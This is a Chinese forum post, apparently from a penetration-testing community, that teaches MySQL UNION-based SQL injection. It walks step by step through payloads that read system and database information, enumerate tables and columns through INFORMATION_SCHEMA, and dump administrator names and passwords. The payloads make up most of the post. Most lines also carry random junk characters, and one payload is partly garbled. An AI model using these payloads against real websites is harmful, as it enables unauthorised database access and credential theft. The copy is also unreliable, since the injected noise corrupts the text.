中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法2 u1 U- Q0 z7 c3 |+ i0 E- X
8 Q4 f* g6 ~/ ?: v2 P. ]
学习盲注前先了解下 IFORMATION_SCHEMA 库
- J" X* s9 {3 H: n" `+ T; v" ]6 ]9 }$ O
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
* b6 a$ L  P  X/ M! Z存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
4 t9 I) e& t: B6 o( r( r. E& W1.得到所有数据库名:+ G9 a( p0 N4 K+ l! S: W7 u
|SCHEMATA ->存储数据库名的表
  U" V0 D1 b! S|---字段:SCHEMA_NAME ->数据库名称
" L, Q! P& s7 ~4 R  h, m; y6 @/ Y  t  l
|TABLES ->存储表名
4 ^9 b) l. t- @5 X|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名4 {& C" {- C+ x0 z! N: Z8 X
|---字段:TABLE_NAME ->存储表的表名
# l: T% i/ v& d6 n$ M- L. V+ H7 P
|COLUMNS ->存储的字段名表( v' t& h5 u6 _5 {
|---字段:TABLE_SCHEMA ->该字段所属数据库名/ u4 r; b  ^7 p9 k( y# G
|---字段:TABLE_NAME ->存储所属表的名称, O" w" D- K' a1 e6 c3 r

% X$ i, _& \8 R% n6 A|---字段:COLUMN_NAME ->该字段的名称
$ x! X+ t6 Q) t7 O
- n- t! G6 j1 P# {8 ] % c+ Q  E1 P( p% V. S

9 E- F( {# s( p###########################################################################' c9 u. M" g4 M& |1 a+ Z

! `' j, z1 B6 u0x001 获取系统信息:8 z: p* Z" O5 Y0 q" g. p. D

! M+ S  n) Q7 Z- x; J/ `union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
) e* s1 `' g. |  C8 U
- d; {0 _/ D  Z$ g( j" L2 v, x/*, f4 x8 D9 u" l  x. v
  f3 p0 i  |, g! r# `% f0 K# `
@@global.version_compile_os 获取系统版本
- b  x8 E0 Q8 A2 {& W+ h( S$ \/ r" |  c( k! |4 ~) X
@@datadir 数据库路径
+ {1 L+ K0 V! l$ o9 f- L1 Xdatabase() 当前数据库名称
( \% @8 T/ _! I" i2 _9 ?2 l$ R( q0x3c62723e 换行HEX值
# u3 g, r" g# @* M: U! f. Y4 R3 }
! s3 B4 d$ i: Y/ _7 f*/" G$ O( d  g( z4 Q5 Q6 S

) k6 B4 H; a4 I% p3 t   {6 ~  c' s# c# O2 A

9 T0 ]: @* I& U7 g$ r3 o' r######################################################################, v; _- [. ^+ s9 M2 g9 H) a- j
' u: J# G' e- v, \# {( T
0x002 获取表名, f+ c% L) }3 v
- F+ M$ C( a. q& D9 S/ {  [
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*2 M! |7 L, S. s- I5 v
3 v' e# k, Q# y0 X* U5 i

  A+ M5 f* p' Z9 E' j3 V- e, l' k+ Q0 c, W( U8 b
/*
5 D  U9 K. _& }3 s: s6 L+ {3 z( j1 X2 e6 h# V
0x67617264656e 为当前数据库名
! z0 Q/ a$ K/ \" ~0 a% X" L: W: n& X' |" v5 o6 t. w: ]
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名8 g3 q9 C" M3 E

0 @/ ~9 m8 k% w- @/ x" f: g*/8 d% r: v* U" Q" i" j, W( |

. o; \* C# P8 Q0 l: i% Y8 F######################################################################' U, i3 R  [& }, g3 H: `9 G* Q1 q# \
  K9 r" B; M8 O8 G0 D
. U# |# B* \# F" ?' V! a( H6 r7 ]9 P

7 \, W& L; D( k& C& \6 D# u0x003 获取字段9 M& m. V% Y# k0 ]" u
- q( C, P$ S% x  P4 K* x
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
& {6 P% N+ x4 ^3 o9 f" Y2 S
7 q5 v; S# C0 d4 y3 [! h/*7 \! \, Y) m% {$ |* o0 D* U1 u8 r
# f8 i6 H2 a: k5 K9 U6 b
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段5 Y: o; g7 m3 J- }' \7 q. y7 |

0 V: W  ?$ W. A! n" z0x61646d696e ->选择一个表
  S( B" n7 U: x, m3 @1 T8 z0 v  H  {" [
0x67617264656e ->数据库名( [% e: t, I# J1 Q! C2 _  s

$ u/ |" p* I& M/ Z" T*/& P$ M( D& g" B/ O

' z' Q6 r; q3 C#####################################################################, I& @6 B* S( q- l
$ b6 h+ m  q4 o8 R3 u2 h# Z" m4 B

4 ?; G- _( O8 b
  ]% B1 d7 ?) y& ^) h3 q; |( X0x004 获取数据! P* _2 }1 N' x, G& b

- ]7 C* S7 e) Y' I' iunion select 1,2,3
& t, A1 Z* k$ R% ^5 ^- m: N! },4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
; D( t9 z' ]) g! i6 m# g  b% A- m! q, o3 n: t; e% D
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
% l$ |& d' ~; R7 M  g
2 K$ b- a3 o9 C
! d+ o/ M& U- R* k% I0 x+ \: q) x; ^- C% b2 _
/*& Y+ d; R. D" f. C0 f. A. q  S0 `2 ^

6 }8 H' q! M" d3 E. f; E0x3c62723e 换行符号HEX编码( s, i5 i, T7 ^  Q$ o+ ]

" X6 ^7 d0 @4 \2 C* ~+ l4 n; Ugroup_concat 同时获得该字段所有数据
" M3 ]% L  v2 l% k5 `% _
. k, s7 i$ O) p/ C% m*/
% M+ W% U' V6 o4 [# e1 s- |4 z# @) v3 B% z4 l# ~5 g





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2